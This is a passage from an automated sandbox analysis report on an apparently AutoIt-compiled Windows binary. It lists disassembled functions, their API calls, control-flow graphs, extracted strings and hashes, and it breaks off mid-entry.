                                                                                                                                                                          • Part of subcall function 002634D3: LoadCursorW.USER32(00000000,00007F00), ref: 002634ED
                                                                                                                                                                          • Part of subcall function 002634D3: LoadIconW.USER32(00000063), ref: 00263503
                                                                                                                                                                          • Part of subcall function 002634D3: LoadIconW.USER32(000000A4), ref: 00263515
                                                                                                                                                                          • Part of subcall function 002634D3: LoadIconW.USER32(000000A2), ref: 00263527
                                                                                                                                                                          • Part of subcall function 002634D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0026353F
                                                                                                                                                                          • Part of subcall function 002634D3: RegisterClassExW.USER32(?), ref: 00263590
                                                                                                                                                                          • Part of subcall function 002635B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002635E1
                                                                                                                                                                          • Part of subcall function 002635B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00263602
                                                                                                                                                                          • Part of subcall function 002635B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00263368,?), ref: 00263616
                                                                                                                                                                          • Part of subcall function 002635B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00263368,?), ref: 0026361F
                                                                                                                                                                          • Part of subcall function 0026396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00263A3C
                                                                                                                                                                        Strings
                                                                                                                                                                        • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 002A3CAA
                                                                                                                                                                        • 0$3, xrefs: 00263495
                                                                                                                                                                        • runas, xrefs: 002A3D75
                                                                                                                                                                        • AutoIt, xrefs: 002A3CA5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                                                        • String ID: 0$3$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                                                                                        • API String ID: 683915450-107653589
                                                                                                                                                                        • Opcode ID: 3c8f2c3c29afab7d8374e401c3fc950da68729b221a6858cd406d94d6f8ccec5
                                                                                                                                                                        • Instruction ID: 133427d81a0092f3280557ae9b8bf670bfd0dc4f384b273943ea1fa22f52cd3e
                                                                                                                                                                        • Opcode Fuzzy Hash: 3c8f2c3c29afab7d8374e401c3fc950da68729b221a6858cd406d94d6f8ccec5
                                                                                                                                                                        • Instruction Fuzzy Hash: 6151F830118341AAC703FF61AC85DBFBBB9AF85754F00442DF582561A2DF648AE9DF62
                                                                                                                                                                        Function 002CDC54 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1741 2cdc54-2cdc9b call 26bf73 * 3 call 265851 call 2ceab0 1752 2cdc9d-2cdca6 call 266b7c 1741->1752 1753 2cdcab-2cdcdc call 26568e FindFirstFileW 1741->1753 1752->1753 1757 2cdcde-2cdce0 1753->1757 1758 2cdd4b-2cdd52 FindClose 1753->1758 1757->1758 1759 2cdce2-2cdce7 1757->1759 1760 2cdd56-2cdd78 call 26bd98 * 3 1758->1760 1761 2cdce9-2cdd24 call 26bed9 call 267bb5 call 266b7c DeleteFileW 1759->1761 1762 2cdd26-2cdd38 FindNextFileW 1759->1762 1761->1762 1776 2cdd42-2cdd49 FindClose 1761->1776 1762->1757 1765 2cdd3a-2cdd40 1762->1765 1765->1757 1776->1760
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00265851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002655D1,?,?,002A4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00265871
                                                                                                                                                                          • Part of subcall function 002CEAB0: GetFileAttributesW.KERNEL32(?,002CD840), ref: 002CEAB1
                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 002CDCCB
                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 002CDD1B
                                                                                                                                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 002CDD2C
                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 002CDD43
                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 002CDD4C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                        • String ID: \*.*
                                                                                                                                                                        • API String ID: 2649000838-1173974218
                                                                                                                                                                        • Opcode ID: b8a35bdd5a9197fd906e7ddde6da0716e4db41eb24a969bbc6e978d96d766113
                                                                                                                                                                        • Instruction ID: 4424f13c1958144cc16dc42494bf477995dec3ad390def25f78016e879c6b31c
                                                                                                                                                                        • Opcode Fuzzy Hash: b8a35bdd5a9197fd906e7ddde6da0716e4db41eb24a969bbc6e978d96d766113
                                                                                                                                                                        • Instruction Fuzzy Hash: C13181310283459FC305EF20D885DAFB7E8BE95314F404E6DF8D692192EB21DA59CBA3
                                                                                                                                                                        Function 002CDD87 Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 002CDDAC
                                                                                                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 002CDDBA
                                                                                                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 002CDDDA
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 002CDE87
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 420147892-0
                                                                                                                                                                        • Opcode ID: aa7943be20adce158cffe4d61d98eef15d0a244ddca0ad56c79214067747ee96
                                                                                                                                                                        • Instruction ID: 5387870e32282765526c7ee099f28df46b4a96494c1d7016f19c80c9afb34fe0
                                                                                                                                                                        • Opcode Fuzzy Hash: aa7943be20adce158cffe4d61d98eef15d0a244ddca0ad56c79214067747ee96
                                                                                                                                                                        • Instruction Fuzzy Hash: 7631BF710183019FC311EF60D885FAFBBE8AF99350F000A2DF585871A1EB719999CF92
                                                                                                                                                                        Function 0027AC3E Relevance: 37.4, APIs: 1, Strings: 20, Instructions: 671COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 0 27ac3e-27b063 call 268ec0 call 27bc58 call 26e6a0 7 27b069-27b073 0->7 8 2b8584-2b8591 0->8 11 2b896b-2b8979 7->11 12 27b079-27b07e 7->12 9 2b8593 8->9 10 2b8596-2b85a5 8->10 9->10 15 2b85aa 10->15 16 2b85a7 10->16 17 2b897b 11->17 18 2b897e 11->18 13 27b084-27b090 call 27b5b6 12->13 14 2b85b2-2b85b4 12->14 22 2b85bd 13->22 25 27b096-27b0a3 call 26c98d 13->25 14->22 15->14 16->15 17->18 20 2b8985-2b898e 18->20 23 2b8993 20->23 24 2b8990 20->24 27 2b85c7 22->27 28 2b899c-2b89eb call 26e6a0 call 27bbbe * 2 23->28 24->23 33 27b0ab-27b0b4 25->33 31 2b85cf-2b85d2 27->31 62 27b1e0-27b1f5 28->62 63 2b89f1-2b8a03 call 27b5b6 28->63 34 2b85d8-2b8600 call 284cd3 call 267ad5 31->34 35 27b158-27b16f 31->35 37 27b0b8-27b0d6 call 284d98 33->37 74 2b862d-2b8651 call 267b1a call 26bd98 34->74 75 2b8602-2b8606 34->75 40 27b175 35->40 41 2b8954-2b8957 35->41 56 27b0e5 37->56 57 27b0d8-27b0e1 37->57 45 2b88ff-2b8920 call 26e6a0 40->45 46 27b17b-27b17e 40->46 47 2b895d-2b8960 41->47 48 2b8a41-2b8a79 call 26e6a0 call 27bbbe 41->48 45->62 79 2b8926-2b8938 call 27b5b6 45->79 53 2b8729-2b8743 call 27bbbe 46->53 54 27b184-27b187 46->54 47->28 55 2b8962-2b8965 47->55 48->62 106 2b8a7f-2b8a91 call 27b5b6 48->106 83 2b8749-2b874c 53->83 84 2b888f-2b88b5 call 26e6a0 53->84 64 2b86ca-2b86e0 call 266c03 54->64 65 27b18d-27b190 54->65 55->11 55->62 56->27 68 27b0eb-27b0fc 56->68 57->37 66 27b0e3 57->66 69 2b8ac9-2b8acf 62->69 70 27b1fb-27b20b call 26e6a0 62->70 97 2b8a2f-2b8a3c call 26c98d 63->97 98 2b8a05-2b8a0d 63->98 64->62 95 2b86e6-2b86fc call 27b5b6 64->95 77 27b196-27b1b8 call 26e6a0 65->77 78 2b8656-2b8659 65->78 66->68 68->11 80 27b102-27b11c 68->80 69->33 86 2b8ad5 69->86 74->78 75->74 88 2b8608-2b862b call 26ad40 75->88 77->62 114 27b1ba-27b1cc call 27b5b6 77->114 78->11 81 2b865f-2b8674 call 266c03 78->81 117 2b893a-2b8943 call 26c98d 79->117 118 2b8945 79->118 80->31 93 27b122-27b154 call 27bbbe call 26e6a0 80->93 81->62 136 2b867a-2b8690 call 27b5b6 81->136 104 2b87bf-2b87de call 26e6a0 83->104 105 2b874e-2b8751 83->105 84->62 139 2b88bb-2b88cd call 27b5b6 84->139 86->11 88->74 88->75 93->35 142 2b86fe-2b870b call 268ec0 95->142 143 2b870d-2b8716 call 268ec0 95->143 149 2b8ac2-2b8ac4 97->149 112 2b8a0f-2b8a13 98->112 113 2b8a1e-2b8a29 call 26b4b1 98->113 104->62 141 2b87e4-2b87f6 call 27b5b6 104->141 120 2b8ada-2b8ae8 105->120 121 2b8757-2b8774 call 26e6a0 105->121 153 2b8a93-2b8a9b 106->153 154 2b8ab5-2b8abe call 26c98d 106->154 112->113 129 2b8a15-2b8a19 112->129 113->97 160 2b8b0b-2b8b19 113->160 161 2b86ba-2b86c3 call 26c98d 114->161 162 27b1d2-27b1de 114->162 135 2b8949-2b894f 117->135 118->135 127 2b8aea 120->127 128 2b8aed-2b8afd 120->128 121->62 164 2b877a-2b878c call 27b5b6 121->164 127->128 144 2b8aff 128->144 145 2b8b02-2b8b06 128->145 146 2b8aa1-2b8aa3 129->146 135->62 174 2b869d-2b86ab call 268ec0 136->174 175 2b8692-2b869b call 26c98d 136->175 179 2b88cf-2b88dc call 26c98d 139->179 180 2b88de 139->180 141->62 184 2b87fc-2b8805 call 27b5b6 141->184 185 2b8719-2b8724 call 268577 142->185 143->185 144->145 145->70 146->62 149->62 165 2b8aa8-2b8ab3 call 26b4b1 153->165 166 2b8a9d 153->166 154->149 171 2b8b1b 160->171 172 2b8b1e-2b8b21 160->172 161->64 162->62 197 2b879f 164->197 198 2b878e-2b879d call 26c98d 164->198 165->154 165->160 166->146 171->172 172->20 204 2b86ae-2b86b5 174->204 175->204 183 2b88e2-2b88e9 179->183 180->183 191 2b88eb-2b88f0 call 26396b 183->191 192 2b88f5 call 263907 183->192 209 2b8818 184->209 210 2b8807-2b8816 call 26c98d 184->210 185->62 191->62 208 2b88fa 192->208 199 2b87a3-2b87ae call 289334 197->199 198->199 199->11 215 2b87b4-2b87ba 199->215 204->62 208->62 214 2b881c-2b883f 209->214 210->214 217 2b884d-2b8850 214->217 218 2b8841-2b8848 214->218 215->62 219 2b8852-2b885b 217->219 220 2b8860-2b8863 217->220 218->217 219->220 221 2b8873-2b8876 220->221 222 2b8865-2b886e 220->222 221->62 223 2b887c-2b888a 221->223 222->221 223->62
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: 4/$@/$P/$`*3$`/$d0b$d10m0$d1b$d1r0,2$d5m0$e#3$i$t/$t/$(3$(3$(3$(3$/$/
                                                                                                                                                                        • API String ID: 0-1403865987
                                                                                                                                                                        • Opcode ID: f7c29095bd38971fc55a144cf1247b1d62013a1bd5d1b8693a822e5182c4d844
                                                                                                                                                                        • Instruction ID: 7ea1822b4d1c7b936cdf47899941e023e9de625436d7abeddbe2bb4343950eab
                                                                                                                                                                        • Opcode Fuzzy Hash: f7c29095bd38971fc55a144cf1247b1d62013a1bd5d1b8693a822e5182c4d844
                                                                                                                                                                        • Instruction Fuzzy Hash: E36257745283468FC725DF14C084AAAFBE5BF88348F10896EE59D8B361DB70D965CF82
                                                                                                                                                                        Function 00263624 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 53windowregistryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00263657
                                                                                                                                                                        • RegisterClassExW.USER32(00000030), ref: 00263681
                                                                                                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00263692
                                                                                                                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 002636AF
                                                                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002636BF
                                                                                                                                                                        • LoadIconW.USER32(000000A9), ref: 002636D5
                                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002636E4
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                        • String ID: +$0$0+m"&$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                        • API String ID: 2914291525-1735067768
                                                                                                                                                                        • Opcode ID: 52956786c0878750b702df2b905300672505bd3b23770cf49ce9b7f3d67f788c
                                                                                                                                                                        • Instruction ID: 131699fff939661b2c2dd89d38f6abdfdad45b9f5db330033ac9d5a09bc139d9
                                                                                                                                                                        • Opcode Fuzzy Hash: 52956786c0878750b702df2b905300672505bd3b23770cf49ce9b7f3d67f788c
                                                                                                                                                                        • Instruction Fuzzy Hash: 7E21F7B5D11308AFDB01DF94EC89BAEBBB9FB08760F10412AF611A62A0D7B44554CF94
                                                                                                                                                                        Function 0026370F Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 145windowtimeregistryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 356 26370f-263724 357 263726-263729 356->357 358 263784-263786 356->358 360 26378a 357->360 361 26372b-263732 357->361 358->357 359 263788 358->359 364 26376f-263777 DefWindowProcW 359->364 365 263790-263795 360->365 366 2a3df4-2a3e1c call 262f92 call 27f23c 360->366 362 263804-26380c PostQuitMessage 361->362 363 263738-26373d 361->363 371 2637b8-2637ba 362->371 367 263743-263747 363->367 368 2a3e61-2a3e75 call 2cc8f7 363->368 370 26377d-263783 364->370 372 263797-26379a 365->372 373 2637bc-2637e3 SetTimer RegisterWindowMessageW 365->373 400 2a3e21-2a3e28 366->400 374 26380e-263818 call 27fcad 367->374 375 26374d-263752 367->375 368->371 391 2a3e7b 368->391 371->370 379 2637a0-2637b3 KillTimer call 263907 call 2659ff 372->379 380 2a3d95-2a3d98 372->380 373->371 376 2637e5-2637f0 CreatePopupMenu 373->376 393 26381d 374->393 381 2a3e46-2a3e4d 375->381 382 263758-26375d 375->382 376->371 379->371 386 2a3d9a-2a3d9e 380->386 387 2a3dd0-2a3def MoveWindow 380->387 381->364 397 2a3e53-2a3e5c call 2c1423 381->397 389 2637f2-263802 call 26381f 382->389 390 263763-263769 382->390 394 2a3dbf-2a3dcb SetFocus 386->394 395 2a3da0-2a3da3 386->395 387->371 389->371 390->364 390->400 391->364 393->371 394->371 395->390 401 2a3da9-2a3dba call 262f92 395->401 397->364 400->364 405 2a3e2e-2a3e41 call 263907 call 26396b 400->405 401->371 405->364
                                                                                                                                                                        APIs
                                                                                                                                                                        • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00263709,?,?), ref: 00263777
                                                                                                                                                                        • KillTimer.USER32(?,00000001,?,?,?,?,?,00263709,?,?), ref: 002637A3
                                                                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 002637C6
                                                                                                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00263709,?,?), ref: 002637D1
                                                                                                                                                                        • CreatePopupMenu.USER32 ref: 002637E5
                                                                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 00263806
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                        • String ID: 0$3$0$3$TaskbarCreated
                                                                                                                                                                        • API String ID: 129472671-1062755802
                                                                                                                                                                        • Opcode ID: 47cf0d306d270748715239951e395e247d4ad25c31890d9cf29ecda19ce8af50
                                                                                                                                                                        • Instruction ID: 1e9bc3aee808aa88fcb71a1a970bb683e13e6487c7ecb9b66bab9b493eca2057
                                                                                                                                                                        • Opcode Fuzzy Hash: 47cf0d306d270748715239951e395e247d4ad25c31890d9cf29ecda19ce8af50
                                                                                                                                                                        • Instruction Fuzzy Hash: F54108F4134146BBDB17EF389C8DBBABAA9EB06310F104125F5028A191CBB59BB4D761
                                                                                                                                                                        Function 002A09DB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 412 2a09db-2a0a0b call 2a07af 415 2a0a0d-2a0a18 call 28f636 412->415 416 2a0a26-2a0a32 call 295594 412->416 421 2a0a1a-2a0a21 call 28f649 415->421 422 2a0a4b-2a0a94 call 2a071a 416->422 423 2a0a34-2a0a49 call 28f636 call 28f649 416->423 430 2a0cfd-2a0d03 421->430 432 2a0b01-2a0b0a GetFileType 422->432 433 2a0a96-2a0a9f 422->433 423->421 436 2a0b0c-2a0b3d GetLastError call 28f613 CloseHandle 432->436 437 2a0b53-2a0b56 432->437 434 2a0aa1-2a0aa5 433->434 435 2a0ad6-2a0afc GetLastError call 28f613 433->435 434->435 439 2a0aa7-2a0ad4 call 2a071a 434->439 435->421 436->421 451 2a0b43-2a0b4e call 28f649 436->451 442 2a0b58-2a0b5d 437->442 443 2a0b5f-2a0b65 437->443 439->432 439->435 444 2a0b69-2a0bb7 call 2954dd 442->444 443->444 445 2a0b67 443->445 454 2a0bb9-2a0bc5 call 2a092b 444->454 455 2a0bc7-2a0beb call 2a04cd 444->455 445->444 451->421 454->455 461 2a0bef-2a0bf9 call 298a2e 454->461 462 2a0bfe-2a0c41 455->462 463 2a0bed 455->463 461->430 464 2a0c62-2a0c70 462->464 465 2a0c43-2a0c47 462->465 463->461 468 2a0cfb 464->468 469 2a0c76-2a0c7a 464->469 465->464 467 2a0c49-2a0c5d 465->467 467->464 468->430 469->468 471 2a0c7c-2a0caf CloseHandle call 2a071a 469->471 474 2a0ce3-2a0cf7 471->474 475 2a0cb1-2a0cdd GetLastError call 28f613 call 2956a6 471->475 474->468 475->474
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 002A071A: CreateFileW.KERNEL32(00000000,00000000,?,002A0A84,?,?,00000000,?,002A0A84,00000000,0000000C), ref: 002A0737
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 002A0AEF
                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 002A0AF6
                                                                                                                                                                        • GetFileType.KERNEL32(00000000), ref: 002A0B02
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 002A0B0C
                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 002A0B15
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 002A0B35
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 002A0C7F
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 002A0CB1
                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 002A0CB8
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                        • String ID: H
                                                                                                                                                                        • API String ID: 4237864984-2852464175
                                                                                                                                                                        • Opcode ID: 3c654fd0e132f83fe28074b31788e36bd78702f45a7f97b75ed77c132a9e7931
                                                                                                                                                                        • Instruction ID: aac4e4de66ee72c5a492788a2cd06b68b627797efffafd6453edfa79a63c23b5
                                                                                                                                                                        • Opcode Fuzzy Hash: 3c654fd0e132f83fe28074b31788e36bd78702f45a7f97b75ed77c132a9e7931
                                                                                                                                                                        • Instruction Fuzzy Hash: 42A11832A241158FDF19AF68DC91BAD7BA5EB07324F140259F811DB2E2DB319D22CF61
                                                                                                                                                                        Function 002652A7 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00265594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,002A4B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 002655B2
                                                                                                                                                                          • Part of subcall function 00265238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0026525A
                                                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 002653C4
                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 002A4BFD
                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 002A4C3E
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 002A4C80
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002A4CE7
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002A4CF6
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
